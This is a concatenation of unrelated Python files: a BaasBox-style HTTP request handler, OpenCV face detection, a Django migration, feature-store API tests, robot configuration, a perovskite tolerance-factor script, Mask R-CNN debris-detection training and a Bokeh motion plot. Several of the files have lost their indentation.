def do_POST(self):
self._set_session()
parsed = urllib.parse.urlparse(self.path)
path = parsed[2]
body = self._get_body()
self._handle_path(path, body)
def do_PUT(self):
self._set_session()
parsed = urllib.parse.urlparse(self.path)
path = parsed[2]
body = self._get_body()
self._handle_path(path, body)
def do_DELETE(self):
self._set_session()
parsed = urllib.parse.urlparse(self.path)
path = parsed[2]
self._handle_path(path, None)
def log_message(self, format, *args):
"""
overwrites the log_message function of the BaseHTTPRequestHandler.
prevents unnecessary output.
"""
return
#HELPER FUNCTIONS
def _create_response(self, result, data, code):
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
response = {
"result": result,
"data": data,
"http_code": code
}
dump = json.dumps(response)
self.wfile.write(bytes(dump, 'utf-8'))
def _remove_array(self, d):
"""
the urllib parser returns parameter-arrays.
this function removes the array, if just one value is inside
and returns the value without it
"""
for key, value in d.items():
if isinstance(value, list) and len(value) == 1:
d[key] = value[0]
return d
def _get_body(self):
"""
reads the body-length of the header and parses for the given length.
If possible, the body is returned as json, otherwise in its raw form.
"""
content_len = int(self.headers.get('content-length'))
body_utf_8 = self.rfile.read(content_len)
body = body_utf_8.decode('utf-8')
try:
body = json.loads(body)
except ValueError:
pass
return body
    def _has_rights(self, command):
        """
        checks if a user has the right to perform a command.
        the allowed commands are defined in the config-file.
        """
        if self.session['user'] is None:
            return command in Config.COMMANDS_UNKNOWN
        return command in Config.COMMANDS_USER
def _set_session(self):
"""
extracts the token from the http-request(field x-bb-session)
and looks for a corresponding session.
"""
#if self.headers.get('connection') == 'keep-alive':
# self.server.write('keeping connection alive')
# self.close_connection = False
#else:
# self.close_connection = True
if 'x-bb-session' in self.headers:
token = self.headers['x-bb-session']
if not hasattr(self, 'session'):
session = self.server.get_session(token)
if session:
self.session = session
if not hasattr(self, 'session'):
self.session = self.server.get_default_session()
if not self.server.is_muted_requesthandler():
self.server.write(str(self.session['user'] and self.session['user']['user']) + ': ' + self.path)
def _handle_path(self, path, params):
"""
extracts the parameters of the url and calls the appropriate interface-function,
provided that the user has the required rights.
"""
path_array = path.lstrip('/').split('/')
if len(path_array) < 1:
return self._handle_error('path is invalid')
elif self._has_rights(path_array[0]) is False:
self.server.write_err('USER HAS NO RIGHT TO DO THIS')
else:
function = getattr(self, '_intf_' + path_array[0], None)
if function:
return function(path_array, params)
else:
self.server.write_err('interface does not exist')
def _handle_cursor(self, cursor):
"""
if a plugin-function returns a database-cursor,
this function extracts the documents and packs them into a list.
"""
result_size = cursor.count()
data = []
for result in cursor:
data.append(result)
return data
def _handle_error(self, message):
"""
this function is so far only called when an invalid path is given.
more error handling should happen here in future.
"""
data = {
"result": "error",
"message": message,
"resource": self.path,
"method": self.command,
"request-header": str(self.headers)
}
self._create_response('error', data, 401)
#----- INTERFACE FUNCTIONS -----
def _intf_asset(self, path_array, params):
"""
A client can request a file here.
So far only one file exists: the game-configuration.
"""
filename = path_array[1] + '.json'
with open(os.getcwd() + '/assets/' + filename, 'r') as f:
try:
asset = json.load(f)
return self._create_response('ok', asset, 200)
except ValueError:
self.server.write('gameConfiguration could not be parsed')
return None
def _intf_document(self, path_array, params):
"""
inserts a document into a database-collection.
the collection is given in the path_array and params is the actual document
"""
collection = path_array[1]
if collection in self.session['plugins']:
plugin = self.session['plugins'][collection]
if 'insert' in plugin.get_public_endpoint():
doc = plugin.insert(params)
if doc:
return self._create_response('ok', doc, 201)
def _intf_following(self, path_array, params):
"""
Returns users which the session-owner is following
"""
assert len(path_array) == 2
following = self.session['plugins']['users'].get_following(path_array[1])
self._create_response('ok', following, 200)
def _intf_followers(self, path_array, params):
"""
Returns the followers of the session-owner
"""
assert len(path_array) == 2
followers = self.session['plugins']['users'].get_followers(path_array[1])
self._create_response('ok', followers, 200)
def _intf_follow(self, path_array, params):
"""
Adds a user with given username to the following-array of the session-owner
"""
assert len(path_array) == 2
updated_user = None
userP = self.session['plugins']['users']
if self.command == 'DELETE':
updated_user = userP.set_unfollow(path_array[1])
else:
updated_user = userP.set_follow(path_array[1])
if updated_user is not None:
self._create_response('ok', self.session['user'], 200)
def _intf_login(self, path_array, params):
"""
login with credentials.
        if this is successful, create a new session-object and return the token
"""
assert 'username' in params
assert 'password' in params
params = self._remove_array(urllib.parse.parse_qs(params))
username = params['username']
password = params['password']
new_session = self.server.authenticate(username, password)
if new_session:
self.session = new_session
return self._create_response('ok', {'user': self.session['user'], 'token':self.session['token']}, 200)
else:
            self.server.write('authentication unsuccessful')
def _intf_logout(self, path_array, params):
"""
logout, i.e. delete session-object
"""
if self.session['user'] is not None:
self.server.delete_session(self.session)
return self._create_response('ok', None, 200)
def _intf_me(self, path_array, params):
"""
returns the user-document of the session-owner
"""
if 'user' in self.session and self.session['user']['_id'] != 'admin.default':
user = self.session['user']
if self.command == 'PUT':
assert params
user = self.session['plugins']['users'].update_fields(params)
assert user
self.session['user'] = user
return self._create_response('ok', user, 200)
def _intf_plugin(self, path_array, params):
"""
calls a public endpoint of a plugin.
A plugin-function is a public-endpoint, if it is inside the public-endpoint-array of the plugin.
An example is the public-endpoint function get_by_id() of the arguments-plugin.
"""
plugin = path_array[1]
function = path_array[2]
if plugin in self.session['plugins']:
plugin = self.session['plugins'][plugin]
if function in plugin.get_public_endpoint():
function = getattr(plugin, function, None)
result = function(params)
data = {}
if type(result) is cursor.Cursor:
data = self._handle_cursor(result)
else: data = result
self._create_response('ok', data, 200)
else:
self.server.write('no public endpoint defined with name ' + function)
return None
else:
self.server.write('no plugin found with name ' + plugin)
return None
def _intf_user(self, path_array, params):
"""
either return an existing user with given username or create a new user (depends on the HTTP method).
In the second case a registration takes place.
        The registration could, but does not, use the _intf_document (as defined by the Baasbox protocol)
"""
userP = self.session['plugins']['users']
user = None
if self.command == 'GET':
assert len(path_array) > 1
user = userP.get_user(path_array[1])
elif self.command == 'POST':
assert 'username' in params and 'password' in params and 'email' in params and 'lang' in params
user = userP.insert(params['username'], params['password'], params['email'], params['lang'])
if user:
return self._create_response('ok', user, 200)
|
import cv2
import numpy as np
face_cascade = cv2.CascadeClassifier('/users/shreykhandelwal/opencv/haarcascade_frontalface_default.xml')
cap = cv2.VideoCapture(0)
while True:
    ret, frame = cap.read()
    if not ret:
        # frame could not be read from the camera; stop the loop
        break
    frame = cv2.resize(frame, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_AREA)
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    # scale factor 1.3, min neighbors 5
    face_rects = face_cascade.detectMultiScale(gray, 1.3, 5)
    for (x, y, w, h) in face_rects:
        cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 3)
    cv2.imshow('face detector', frame)
    # wait 1 ms between frames instead of blocking; Esc (27) quits
    c = cv2.waitKey(1)
    if c == 27:
        break
cap.release()
cv2.destroyAllWindows()
|
# read a text file and print its contents
with open('a.txt') as f:
    content = f.read()
print(content)
|
# Generated by Django 2.1.5 on 2019-04-16 08:51
import CRM.models
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('CRM', '0006_auto_20190319_0815'),
]
operations = [
migrations.AlterField(
model_name='client',
name='copy_of_id',
field=models.FileField(blank=True, upload_to=CRM.models.UploadFolder('documents/clients')),
),
]
|
from typing import List
from requests.auth import HTTPBasicAuth
from shared.logger.logging_config import logger
from shared.models.feature_store_models import Feature, FeatureSet
from ...rest_api import crud
from ..fixtures.conftest import APP, get_my_session, override_get_db, test_app
from ..fixtures.feature import (create_deployed_fset, create_undeployed_fset,
test_session_create)
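# Override the get_db dependency so that every request handled by the test app
# resolves crud.get_db to the test database session instead of a real one.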
APP.dependency_overrides[crud.get_db] = override_get_db
basic_auth = HTTPBasicAuth('user','password')
bad_feature = {
"name": 'feature_without_feature_set',
"description": 'a feature that should fail because there is no feature set',
"feature_data_type": {'data_type': 'VARCHAR','length':250},#'VARCHAR(250)',
"feature_type": 'C',
"tags": None
}
good_feature = {
"name": 'good_feature',
"description": 'a feature that should succeed because there is a feature set',
"feature_data_type": {'data_type': 'VARCHAR','length':250},#'VARCHAR(250)',
"feature_type": 'C',
"tags": None
}
def test_create_feature_no_auth(test_app):
response = test_app.post('/features',params={'schema': 'fake_schema', 'table': 'badtable'}, json=bad_feature)
assert response.status_code == 401, 'Should fail because there is no authentication'
mes = response.json()['message']
assert mes == 'Not authenticated', mes
def test_create_feature_no_feature_set(test_app, create_undeployed_fset):
APP.dependency_overrides[crud.get_db] = lambda: (yield create_undeployed_fset) # Give the "server" the same db session
response = test_app.post('/features',params={'schema': 'fake_schema', 'table': 'badtable'},
json=bad_feature, auth=basic_auth)
assert response.status_code == 404, 'Should fail because there is no feature set with provided name'
mes = response.json()['message']
assert 'Feature Set ' in mes and 'does not exist' in mes, mes
def test_create_feature_existing_feature_set(test_app, create_undeployed_fset):
APP.dependency_overrides[crud.get_db] = lambda: (yield create_undeployed_fset) # Give the "server" the same db session
logger.info("============================= Starting test_create_feature_existing_feature_set =============================")
response = test_app.post('/features',params={'schema': 'test_fs', 'table': 'FSET_1'},
json=good_feature, auth=basic_auth)
assert response.status_code == 201, response.json()['message']
# Assert feature exists
fs: List[Feature] = create_undeployed_fset.query(Feature).all()
assert len(fs) == 1, f'Only one feature should exist, but {len(fs)} do'
assert fs[0].name == 'good_feature'
def test_create_feature_deployed_feature_set_upper_case(test_app, create_deployed_fset):
APP.dependency_overrides[crud.get_db] = lambda: (yield create_deployed_fset) # Give the "server" the same db session
logger.info("============================= Starting test_create_feature_existing_feature_set =============================")
response = test_app.post('/features',params={'schema': 'test_fs', 'table': 'FSET_1'}, # Upper case schema/table
json=good_feature, auth=basic_auth)
assert response.status_code == 409, f'Should fail because the Feature Set is already deployed. ' \
f'Status Code: {response.status_code}, response: {response.json()}'
def test_create_feature_deployed_feature_set_lower_case(test_app, create_deployed_fset):
APP.dependency_overrides[crud.get_db] = lambda: (yield create_deployed_fset) # Give the "server" the same db session
logger.info("============================= Starting test_create_feature_existing_feature_set =============================")
response = test_app.post('/features',params={'schema': 'test_fs', 'table': 'FSET_1'}, # Lower case schema/table
json=good_feature, auth=basic_auth)
assert response.status_code == 409, response.json()['message']
def test_db_setup(test_session_create):
logger.info("============================= Starting test_db_setup =============================")
sess = test_session_create
assert len(sess.query(FeatureSet).all())==1
assert not sess.query(FeatureSet).one().deployed
|
'''
Configuration file for the biped robot
'''
#############################
## Raspberry Pi version number
##
#############################
RASP_VERSION = 4
#############################
## DBSP parameters
##
#############################
# Serial port of the DBSP Raspberry Pi expansion board
DBSP_PORT_NAME = '/dev/ttyAMA0' if RASP_VERSION == 3 else '/dev/ttyS0'
# Baud rate of the DBSP serial connection
DBSP_BAUDRATE = 57600
#############################
## DBSP expansion board GPIO definitions
##
#############################
LAMP_GPIO = 'GPIO4' # GPIO of the fill light on the expansion board
HEAD_SERVO_ID = 0x31 # ID of the head servo
HEAD_SERVO_ANGLE = -60 # Servo angle
# Note: the sign depends on the servo mounting direction
#############################
## DBSP action group (Marco) parameters
##
#############################
# Marco ID for standing up
MARCO_STAND_UP_ID = 100000130
# Stand-up execution period (unit: ms)
MARCO_STAND_UP_INTERVAL = 336
# Marco ID for the stand-up preparation pose
MARCO_STAND_UP_PRE_ID = 935570809
# Stand-up preparation execution period (unit: ms)
MARCO_STAND_UP_PRE_INTERVAL = 150
# Marco ID for walking forward
MARCO_GO_FORWARD_ID = 100000136
MARCO_GO_FORWARD_INTERVAL = 380 # 500
# Marco ID for veering left while walking forward
MARCO_GO_LEFT_ID = 1071071745
MARCO_GO_LEFT_INTERVAL = 480
# Marco ID for veering right while walking forward
MARCO_GO_RIGHT_ID = 542918673
MARCO_GO_RIGHT_INTERVAL = 480
#############################
## Camera parameters
##
#############################
# Camera device node
CAM_PORT_NAME = '/dev/video0'
# Frame width
CAM_IMG_WIDTH = 680
# Frame height
CAM_IMG_HEIGHT = 480
# Brightness
CAM_BRIGHNESS = 4
# Contrast
CAM_CONTRUST = 44
# Hue
CAM_HUE = 322
# Saturation
CAM_SATURATION = 43
# Sharpness
CAM_SHARPNESS = 45
# Gamma
CAM_GAMMA = 150
# Enable automatic white balance
CAM_AWB = True
# White balance temperature
CAM_WHITE_BALANCE_TEMPRATURE = 4600
# Automatic exposure
CAM_EXPOSURE_AUTO = True
# Absolute exposure value
CAM_EXPOSURE_ABSOLUTE = 78
# Camera frame rate
CAM_FPS = 30
#############################
## Mechanical parameters of the camera mounting position
##
#############################
# Camera mounting height above the ground (unit: cm)
# 37 cm when mounted on the head, 29 cm when mounted on the chest
CAM_H = 29 # 37
# Camera pitch angle (unit: degrees)
# Angle between the camera optical axis and the horizontal plane
CAM_PITCH = 60
#############################
## Line type
## 1: single track  3: triple track
#############################
LINE_TYPE = 1
|
# coding: utf-8
# In[2]:
# A script to calculate tolerance factors of ABX3 perovskites using bond valences from 2016
# Data from the International Union of Crystallography
# Author: Nick Wagner
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import pymatgen as mg
from pymatgen.analysis.bond_valence import calculate_bv_sum, calculate_bv_sum_unordered, BVAnalyzer
# In[ ]:
bv = pd.read_csv("../data/Bond_valences2016.csv")
bv.head()
# In[3]:
# Use element names and valences to lookup bond valence
def get_bv_params(cation, anion, cat_val, an_val):
bond_val_list = bv[(bv['Atom1'] == cation) & (bv['Atom1_valence'] == cat_val) & (bv['Atom2'] == anion) & (bv['Atom2_valence'] == an_val)]
return bond_val_list.iloc[0] # If multiple values exist, take first one
# In[4]:
# A function to calculate a generalized Goldschmidt tolerance factor for perovskites and RP phases
def calc_tol_factor(ion_list, valence_list, rp=0):
if len(ion_list) > 4 or len(ion_list) < 3:
print("Error: there should be three or four elements")
return None
if len(ion_list) < 4:
for i in range(len(valence_list)): # If charge is 2-, make -2 to match tables
if valence_list[i][-1] == '-':
valence_list[i] = valence_list[i][-1] + valence_list[i][:-1]
for i in range(len(valence_list)): # Similarly, change 2+ to 2
valence_list[i] = int(valence_list[i].strip("+"))
if len(ion_list) == 4:
# print("RED ALERT: We are taking averages of bond valence parameters")
AO_value1 = get_bv_params(ion_list[0], ion_list[-1], valence_list[0], valence_list[-1])
AO_value2 = get_bv_params(ion_list[1], ion_list[-1], valence_list[1], valence_list[-1])
AO_values = np.concatenate([AO_value1.values.reshape(1, len(AO_value1)),
AO_value2.values.reshape(1, len(AO_value2))])
AO_B = np.average(AO_values[:, 4])
AO_Ro = np.average(AO_values[:, 5])
AO_valence = np.average(AO_values[:, 1]) # RED ALERT: We are taking averages of bond valence parameters
else:
AO_row = get_bv_params(ion_list[0], ion_list[-1], valence_list[0], valence_list[-1])
BO_row = get_bv_params(ion_list[-2], ion_list[-1], valence_list[-2], valence_list[-1])
if len(ion_list) != 4:
if rp == 0:
AO_bv = AO_row['Ro']-AO_row['B'] * np.log(AO_row['Atom1_valence']/12)
BO_bv = BO_row['Ro']-BO_row['B'] * np.log(BO_row['Atom1_valence']/6)
else: # Currently for Ruddlesden-Popper phases a naive weighted sum is used between A-site coordination of
# 9 in the rocksalt layer and 12 in perovskite
AO_bv = AO_row['Ro']-AO_row['B'] * np.log(AO_row['Atom1_valence']/((9+12*(rp-1))/rp))
BO_bv = BO_row['Ro']-BO_row['B'] * np.log(BO_row['Atom1_valence']/6)
else:
if rp == 0:
AO_bv = AO_Ro-AO_B * np.log(AO_valence/12)
BO_bv = BO_row['Ro']-BO_row['B'] * np.log(BO_row['Atom1_valence']/6)
else: # Currently for Ruddlesden-Popper phases a naive weighted sum is used between A-site coordination of
# 9 in the rocksalt layer and 12 in perovskite
AO_bv = AO_Ro-AO_B * np.log(AO_valence/((9+12*(rp-1))/rp))
BO_bv = BO_row['Ro']-BO_row['B'] * np.log(BO_row['Atom1_valence']/6)
tol_fact = AO_bv / (2**0.5 * BO_bv)
return tol_fact
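# For reference, the quantities combined above follow the bond-valence form of the
# tolerance factor (a summary of what calc_tol_factor computes, not extra input data):
#   d_MO = Ro - B * ln(V / N)        expected M-O bond length for valence V and coordination N
#   t    = d_AO / (sqrt(2) * d_BO)   generalized Goldschmidt tolerance factor
# with N = 12 for the perovskite A site, N = 6 for the B site, and, for a
# Ruddlesden-Popper member rp, an averaged A-site coordination of (9 + 12*(rp-1))/rp,
# e.g. (9 + 12)/2 = 10.5 for rp = 2.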
# In[ ]:
# Test using BaMnO3
# Should return 1.09630165911 for perovskite and 1.07615743313 for rp=2
print(calc_tol_factor(['Ba', 'Mn','O'], ['2+', '4+', '2-']))
print(calc_tol_factor(['Ba', 'Mn','O'], ['2+', '4+', '2-'], rp=2))
# In[5]:
def isanion(atom, anions=['O', 'S', 'F', 'Cl']):
#print "in isanion fun... atom is {} and anions are {}".format(atom, anions)
check = atom in anions
return check
def iscation(atom, cations):
check = atom not in ['O', 'S', 'F', 'Cl']
return check
def MObonds_greedy(structure,Msite, cutoff=3.0):
    # Takes a pymatgen structure and a perovskite B-site element symbol and returns
    # the list of Msite-anion bond lengths for the first matching site.
bond_lengths = []
# determine Bsite and oxygen indexes
for site in structure.sites:
if Msite in str(site):
neighbors = structure.get_neighbors(site, r = cutoff, include_index=True)
for neighbor in neighbors:
elems_on_neighsite = structure.species_and_occu[neighbor[2]].elements
symbols = [elem.symbol for elem in elems_on_neighsite]
if Msite in symbols:
continue
else:
bond_lengths.append(neighbor[1])
if not bond_lengths:
neighbors = structure.get_neighbors(site, r = cutoff+0.6, include_index=True)
for neighbor in neighbors:
elems_on_neighsite = structure.species_and_occu[neighbor[2]].elements
symbols = [elem.symbol for elem in elems_on_neighsite]
if Msite in symbols:
continue
else:
bond_lengths.append(neighbor[1])
return bond_lengths
else:
return bond_lengths
return bond_lengths
# Computes the global instability index (GII) using an automatic cutoff scheme.
# The cutoff is intended to be the longest nearest-neighbor bond length.
def gii_compute(struct, name):
el = struct.species_and_occu[0].elements[0].symbol
max_MObond = np.max(MObonds_greedy(struct, el))
cutoff = max_MObond
# for loop to calculate the BV sum on each atom
BVpara = pd.read_csv("../data/Bond_valences2016.csv")
bv = BVAnalyzer(max_radius=cutoff+0.1)
bv_diffs = []
for atom_indx, site in enumerate(struct.sites):
neighbors = struct.get_neighbors(site, cutoff)
try:
bv_sum = calculate_bv_sum_unordered(site, neighbors)
except:
bv_sum = calculate_bv_sum(site, neighbors)
try:
formal_val = bv.get_valences(struct)[atom_indx]
except:
print('Difficulty obtaining site valences. Returning None')
return None
bv_diffs.append(np.power(np.subtract(bv_sum, formal_val),2))
GII_val = np.sqrt(np.sum(bv_diffs)/struct.composition.num_atoms)
return GII_val
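# A minimal sketch of calling gii_compute on a single structure (the CIF path and
# compound name below are illustrative, not files shipped with this repository):
# example_struct = mg.Structure.from_file('../Structures/BaTiO3.cif')
# print(gii_compute(example_struct, 'BaTiO3'))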
# In[6]:
# Calculate GII for all compounds in your dataset
# Requires one column with elements (e.g. Ba_Ti_O),
# one column with the structure path (e.g. ./Structures/BaTiO3.cif),
# and one column with the formal valences (e.g. 2_4_-2).
# Does not work with disordered compounds due to a Pymatgen limitation
# Output saved to GII_temp.csv in current folder.
# Ideally GII values should be close to 0 and less than 0.2, but good luck
try:
df = pd.read_excel("../data/Dataset.xlsx",sheetname="Combined_MIT+nonMIT")
except:
print("Define df to be your dataset path in the code!")
gii_values = []
for i in df.index:
struct = mg.Structure.from_file('..' + df.loc[i, "struct_file_path"])
name=df.loc[i,'Compound']
gii = gii_compute(struct, name)
gii_values.append(gii)
foo = pd.DataFrame(gii_values)
foo.to_csv("../data/GII_temp.csv")
|
import os
import sys
from numpy import random
import math
import re
import time
import numpy as np
import cv2
import matplotlib
import matplotlib.pyplot as plt
import json
from PIL import Image, ImageDraw
from tensorflow.python.framework.versions import VERSION as __version__
import tensorflow as tf
from imgaug import augmenters as iaa
import warnings
warnings.filterwarnings(action='ignore')
# Set the directory to the MASK_RCNN root
ROOT_DIR = 'D:/Cleansea/Mask_RCNN-cleansea'
#ROOT_DIR = '/home/saflex/projecto_cleansea/Mask_RCNN/Mask_RCNN-master'
assert os.path.exists(ROOT_DIR), 'ROOT_DIR does not exist'
# Import mrcnn libraries
sys.path.append(ROOT_DIR)
from mrcnn.config import Config
from mrcnn import utils
import mrcnn.model as modellib
from mrcnn import visualize
from mrcnn.model import log
physical_devices = tf.config.list_physical_devices('GPU')
tf.config.experimental.set_memory_growth(physical_devices[0], True)
# Directory belonging to MASK-RCNN (training logs)
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# Path to the weights file
COCO_WEIGHTS_PATH = os.path.join(ROOT_DIR, "mask_rcnn_coco.h5")
# Download the COCO pre-trained weights
if not os.path.exists(COCO_WEIGHTS_PATH):
utils.download_trained_weights(COCO_WEIGHTS_PATH)
############################################################
# Configuration
############################################################
class CleanSeaConfig(Config):
"""
    Configuration for training on the CleanSea dataset.
    """
    # Name of this configuration
NAME = "debris"
# We use a GPU with 12GB memory, which can fit two images.
# Adjust down if you use a smaller GPU.
IMAGES_PER_GPU = 1
# Use small images for faster training. Set the limits of the small side
# the large side, and that determines the image shape.
IMAGE_MIN_DIM = 512
IMAGE_MAX_DIM = 512
    # Number of classes + the background
    NUM_CLASSES = 1 + 19 # Cleansea has 19 classes
    # Skip detections with <50% confidence
    DETECTION_MIN_CONFIDENCE = 0.5
    # Modified learning rate
LEARNING_RATE = 0.001
config= CleanSeaConfig()
config.display()
def get_ax(rows=1, cols=1, size=8):
"""Return a Matplotlib Axes array to be used in
all visualizations in the notebook. Provide a
central point to control graph sizes.
Change the default size attribute to control the size
of rendered images
"""
_, ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))
return ax
############################################################
# Dataset
############################################################
class CleanSeaDataset(utils.Dataset):
def load_data(self, dataset_dir, subset):
# Train or validation dataset?
assert subset in ["train_coco", "test_coco"]
dataset_dir = os.path.join(dataset_dir, subset)
print(dataset_dir)
        # Load the JSON annotations file
annotation_json = os.path.join(dataset_dir,"annotations.json")
json_file = open(annotation_json)
coco_json = json.load(json_file)
json_file.close()
print("\nAnotaciones Cargadas\n")
        # Add the class names using the utils.Dataset method
source_name = "coco_like"
for category in coco_json['categories']:
class_id = category['id']
class_name = category['name']
if class_id < 1:
print('Error: Class id for "{}" reserved for the background'.format(class_name))
else:
self.add_class(source_name, class_id, class_name)
print("Nombres Añadidos \n")
        # Store the annotations grouped by image id
annotations = {}
for annotation in coco_json['annotations']:
image_id = annotation['image_id']
if image_id not in annotations:
annotations[image_id] = []
annotations[image_id].append(annotation)
print("Anotaciones Almacenadas\n")
        # Store the images and add them to the dataset
seen_images = {}
for image in coco_json['images']:
image_id = image['id']
if image_id in seen_images:
print("Warning: Skipping duplicate image id: {}".format(image))
else:
seen_images[image_id] = image
try:
image_file_name = image['file_name']
image_width = image['width']
image_height = image['height']
except KeyError as key:
print("Warning: Skipping image (id: {}) with missing key: {}".format(image_id, key))
image_path = os.path.join(dataset_dir, image_file_name)
image_annotations = annotations[image_id]
                # Add the image using the utils.Dataset method
self.add_image(
source=source_name,
image_id=image_id,
path=image_path,
width=image_width,
height=image_height,
annotations=image_annotations
)
print("Imagenes añadidas al Dataset\n")
def load_mask(self, image_id):
""" Carga la mascara de instancia para la imagen dada
MaskRCNN espera mascaras en forma de mapa de bits (altura, anchura e instancias)
Argumentos:
image_id: El ID de la imagen a la que vamos a cargar la mascara
Salida:
masks: Una cadena booleana con estructura (altura, anchya y la cuenta de instancias) con una mascara por instancia
class_ids: Una cadena de 1 dimension de clase ID de la instancia de la mascara """
image_info = self.image_info[image_id]
annotations = image_info['annotations']
instance_masks = []
class_ids = []
for annotation in annotations:
class_id = annotation['category_id']
mask = Image.new('1', (image_info['width'], image_info['height']))
mask_draw = ImageDraw.ImageDraw(mask, '1')
for segmentation in annotation['segmentation']:
mask_draw.polygon(segmentation, fill=1)
bool_array = np.array(mask) > 0
instance_masks.append(bool_array)
class_ids.append(class_id)
mask = np.dstack(instance_masks)
class_ids = np.array(class_ids, dtype=np.int32)
return mask, class_ids
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "object":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
"""Train the model."""
# Training dataset.
dataset_train = CleanSeaDataset()
print("Configuracion para train cargada\n")
dataset_train.load_data("D:/Cleansea/cleansea_dataset/CocoFormatDataset","train_coco")
print("Dataset Inicializado Correctamente\n")
dataset_train.prepare()
print("Preparacion del Dataset Completada\n")
# Validation dataset
dataset_test = CleanSeaDataset()
print("Configuracion para test cargada\n")
dataset_test.load_data("D:/Cleansea/cleansea_dataset/CocoFormatDataset", "test_coco")
print("Dataset Inicializado Correctamente\n")
dataset_test.prepare()
print("Preparacion del Dataset Completada\n")
# Load and display random samples
print("Mostrando Imagenes aleatorias...\n")
image_ids = np.random.choice(dataset_train.image_ids, 4)
for image_id in image_ids:
image = dataset_train.load_image(image_id)
mask, class_ids = dataset_train.load_mask(image_id)
visualize.display_top_masks(image, mask, class_ids, dataset_train.class_names)
print("Inicializing model for training...\n")
model=modellib.MaskRCNN(mode="training", config=config, model_dir=MODEL_DIR)
# Which weights to start with?
init_with = "coco" # imagenet, coco, or last
if init_with == "imagenet":
model.load_weights(model.get_imagenet_weights(), by_name=True)
elif init_with == "coco":
# Load weights trained on MS COCO, but skip layers that
# are different due to the different number of classes
# See README for instructions to download the COCO weights
model.load_weights(COCO_WEIGHTS_PATH, by_name=True,
exclude=["mrcnn_class_logits", "mrcnn_bbox_fc",
"mrcnn_bbox", "mrcnn_mask"])
elif init_with == "last":
# Load the last model you trained and continue training
model.load_weights(model.find_last(), by_name=True)
last_path="D:/Cleansea/Mask_RCNN-cleansea/logs/mask_rcnn_debris_weights1000DA5Heads.h5"
model.load_weights(last_path, by_name=True)
############################################################
# Training
############################################################
# ===============================================================================
# Data Augmentation
# ===============================================================================
seq = iaa.Sequential([
iaa.Fliplr(0.5), # horizontal flips
# Small gaussian blur with random sigma between 0 and 0.5.
# But we only blur about 50% of all images.
iaa.Sometimes(
0.5,
iaa.GaussianBlur(sigma=(0, 0.5))
),
# Strengthen or weaken the contrast in each image.
iaa.LinearContrast((0.75, 1.5)),
# Make some images brighter and some darker.
# In 20% of all cases, we sample the multiplier once per channel,
# which can end up changing the color of the images.
iaa.Multiply((0.8, 1.2), per_channel=0.2),
# Apply affine transformations to each image.
# Scale/zoom them, translate/move them, rotate them and shear them.
iaa.Affine(
scale={"x": (0.8, 1.2), "y": (0.8, 1.2)},
translate_percent={"x": (-0.2, 0.2), "y": (-0.2, 0.2)},
rotate=(-25, 25),
shear=(-8, 8)
)
], random_order=True) # apply augmenters in random order
"""
seq = iaa.Sequential([
iaa.Fliplr(0.5), # horizontal flips
])
"""
# ===============================================================================
# Train the head branches
# Passing layers="heads" freezes all layers except the head
# layers. You can also pass a regular expression to select
# which layers to train by name pattern.
print("Entrenando Heads...\n")
model.train(dataset_train, dataset_test, learning_rate=config.LEARNING_RATE, epochs=5, layers='heads',augmentation=seq)
# Fine tune all layers
# Passing layers="all" trains all layers. You can also
# pass a regular expression to select which layers to
# train by name pattern.
print("Entrenando extensivamente...\n")
model.train(dataset_train, dataset_test,
learning_rate=config.LEARNING_RATE / 10,
epochs=1000,
layers="all",augmentation=seq)
# Save weights
# Typically not needed because callbacks save after every epoch
# Uncomment to save manually
print("Guardando Pesos...\n")
model_path = os.path.join(MODEL_DIR, "mask_rcnn_debris_weights.h5")
model.keras_model.save_weights(model_path)
print("Pesos Guardados en mask_rcnn_debris_weights.h5")
############################################################
# Evaluation
############################################################
class InferenceConfig(CleanSeaConfig):
GPU_COUNT = 1
IMAGES_PER_GPU = 1
USE_MINI_MASK = False
inference_config = InferenceConfig()
# Recreate the model in inference mode
model = modellib.MaskRCNN(mode="inference",
config=inference_config,
model_dir=MODEL_DIR)
# Get path to saved weights
# Either set a specific path or find last trained weights
# model_path = os.path.join(ROOT_DIR, ".h5 file name here")
model_path = model.find_last()
# Load trained weights
print("Loading weights from ", model_path)
model.load_weights(model_path, by_name=True)
image_ids = dataset_test.image_ids
APs = []
for image_id in image_ids:
# Load image and ground truth data
image, image_meta, gt_class_id, gt_bbox, gt_mask =\
modellib.load_image_gt(dataset_test, inference_config,
image_id)
molded_images = np.expand_dims(modellib.mold_image(image, inference_config), 0)
# Run object detection
results = model.detect([image], verbose=0)
r = results[0]
# Compute AP
AP, precisions, recalls, overlaps =\
utils.compute_ap(gt_bbox, gt_class_id, gt_mask,
r["rois"], r["class_ids"], r["scores"], r['masks'])
APs.append(AP)
print("mAP: ", np.mean(APs))
|
from uuid import uuid4
class AbstractStorage(object):
def __init__(self, manager, **config):
self.manager = manager
self.init(**config)
def begin(self):
transaction = uuid4().hex
self.initialize_transaction(transaction)
return transaction
def initialize_transaction(self, transaction_id):
raise NotImplementedError
def add_operation(self, transaction_id, operation, rollback):
raise NotImplementedError
def get(self, transaction_id):
"""This method should return transaction object"""
raise NotImplementedError
def remove_transaction(self, transaction_id):
raise NotImplementedError
def mark_transaction_succesfull(transaction_id, n):
"""This method must set the operation state as done"""
raise NotImplementedError
def mark_operation_failed(self, transaction_id, operation):
raise NotImplementedError
def mark_operation_success(self, transaction_id, operation):
raise NotImplementedError
|
from motion_detector import df
from bokeh.plotting import figure, show, output_file
from bokeh.models import HoverTool, ColumnDataSource
df["Start_string"]=df["Start"].dt.strftime("%Y-%m-%d %H:%M:%S")
df["End_string"]=df["End"].dt.strftime("%Y-%m-%d %H:%M:%S")
plot=figure(x_axis_type='datetime',height=200, width=1000,title="Motion Graph")
plot.ygrid[0].ticker.desired_num_ticks=1
# add hover timestamp info
hover=HoverTool(tooltips=[("Start","@Start_string"),("End","@End_string")])
plot.add_tools(hover)
cds=ColumnDataSource(df)
quad=plot.quad(left="Start",right="End",bottom=0,top=1,color="green",source=cds)
# specify output template
output_file("Graph.html")
